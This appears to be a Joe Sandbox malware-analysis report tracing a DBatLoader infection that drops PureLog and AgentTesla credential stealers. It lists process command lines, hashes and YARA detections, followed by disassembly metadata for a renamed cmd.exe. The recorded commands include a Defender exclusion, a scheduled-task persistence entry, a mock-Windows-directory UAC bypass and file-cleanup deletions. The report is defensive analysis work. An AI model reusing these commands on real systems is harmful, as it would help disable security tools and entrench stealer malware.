Start time:03:56:09
Start date:18/11/2024
Path:C:\Users\Public\Libraries\AnyDesk.PIF
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
Imagebase:0x400000
File size:1'226'240 bytes
MD5 hash:2EF70D96354CC04D9168E8F69E7B17A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:16
Start time:03:56:09
Start date:18/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Imagebase:0x7ff7d1510000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:03:56:09
Start date:18/11/2024
Path:C:\Users\Public\alpha.exe
Wow64 process (32bit):false
Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
Imagebase:0x7ff7d1510000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:05:01:06
Start date:18/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

Target ID:22
Start time:05:01:06
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:05:01:07
Start date:18/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:0x400000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:05:01:07
Start date:18/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Imagebase:0x400000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:05:01:07
Start date:18/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Imagebase:0x420000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:05:01:08
Start date:18/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Imagebase:0x420000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:05:01:08
Start date:18/11/2024
Path:C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
Imagebase:0x400000
File size:352'768 bytes
MD5 hash:5F5105050FBE68E930486635C5557F84
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:05:01:08
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:05:01:08
Start date:18/11/2024
Path:C:\Users\Public\alpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Imagebase:0x420000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:05:01:08
Start date:18/11/2024
Path:C:\Users\Public\xpha.pif
Wow64 process (32bit):true
Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Imagebase:0x590000
File size:18'944 bytes
MD5 hash:B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:05:01:09
Start date:18/11/2024
Path:C:\Users\Public\Libraries\aymtmquJ.pif
Wow64 process (32bit):true
Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
Imagebase:0x400000
File size:68'096 bytes
MD5 hash:C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:05:01:09
Start date:18/11/2024
Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
Imagebase:0x400000
File size:1'425'408 bytes
MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1941635606.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.1931595213.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1957754324.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1916978924.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

Target ID:33
Start time:05:01:09
Start date:18/11/2024
Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:0x550000
File size:70'656 bytes
MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:05:01:11
Start date:18/11/2024
Path:C:\Windows\System32\alg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\alg.exe
Imagebase:0x140000000
File size:1'225'728 bytes
MD5 hash:39868E9AD4918B18A6AD00C9FF3BE84E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:05:01:12
Start date:18/11/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:0xc10000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:05:01:12
Start date:18/11/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
Imagebase:0xb40000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:05:01:12
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:05:01:12
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:05:01:19
Start date:18/11/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff7fb730000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:05:01:21
Start date:18/11/2024
Path:C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:138'056 bytes
MD5 hash:BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:41
Start time:05:01:21
Start date:18/11/2024
Path:C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:174'408 bytes
MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:42
Start time:05:01:21
Start date:18/11/2024
Path:C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:154'952 bytes
MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:7CB21DCAD3B21967F4E5DF9CF3F75EC0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:22
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'226'240 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:2EF70D96354CC04D9168E8F69E7B17A0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:25
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:25
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000003.1847868691.0000000000891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000002.2058811491.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000002.2046318436.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000002.2060060540.0000000005740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002F.00000002.2051386089.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000002F.00000002.2051386089.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002F.00000002.2058173274.0000000003E55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

Execution Graph

Execution Coverage:5.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:37.3%
Total number of Nodes:657
Total number of Limit Nodes:27
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
• Instruction ID: 26f6fce0b16e7127b0682493bc88e9228820a00b601e91ffb9aa57b5547d5f30
• Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
• Instruction Fuzzy Hash: 0042D662A0968B85FB50AB1198502BEE7A1EF85794FD44272DD1F877F5DFBCE0448320

Control-flow Graph

[Control-flow graph of function 7ff7d151aa54; legend: Executed / Not Executed]
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
• String ID: :$:$:$:ON$OFF
• API String ID: 972821348-467788257
• Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction ID: a1cad378b9ebd1b9c19244478a5c33789b3475cf11d36777d6b64c224af23755
• Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction Fuzzy Hash: E1229222A0868B86FB66BF21951427DF6A1EF45B80FC98077D90F473B4DEBDA4448370

Control-flow Graph

[Control-flow graph of function 7ff7d15251ec; legend: Executed / Not Executed]
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: InfoLocale$DefaultUsersetlocale
• String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
• API String ID: 1351325837-2236139042
• Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction ID: 2cfb79a8ca0fe75f2f9909264f8608b2b5a74e7f4394c3e4601b634e09182452
• Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction Fuzzy Hash: 20F15966B1864B85FB11AF11E9102BDA2A5BF05B84FE44177DA1F836B4EFBCE505C320

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
• String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
• API String ID: 388421343-2905461000
• Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
• Instruction ID: 84bd1d350d77b01b83f0786bfcac9955e31c9004c3aea83c9bf83a4dcce896ce
• Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
• Instruction Fuzzy Hash: 5EF13B32A18A8B85FB60AB01E4543BEF6A0FB85780FD44176D94F82675DFBCE445CB60

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryValue$CloseOpensrandtime
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 145004033-3846321370
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 49f0bba741916081369efb74f02044f29ac6390f18ffb8293604677542a470ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FE13826529A8BC6F760AB10E4501BEF7A0FB99744FD05137EA8F42A64DFBCD544CB20

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2624720099-1920437939
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4b892bcacf7056bc7a33056b5d9312e2c34e159c59401c98ff40f4847366f85d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54C1AD32F0864B8AF750BB6094542BCFAA1FF49754FD4417AE90F866B6DFBCA4418720

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 873889042-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 27c65da7f8d538de6f121bbd0d71dcc46de16a60aaae5e6e09062b1dca0debcd
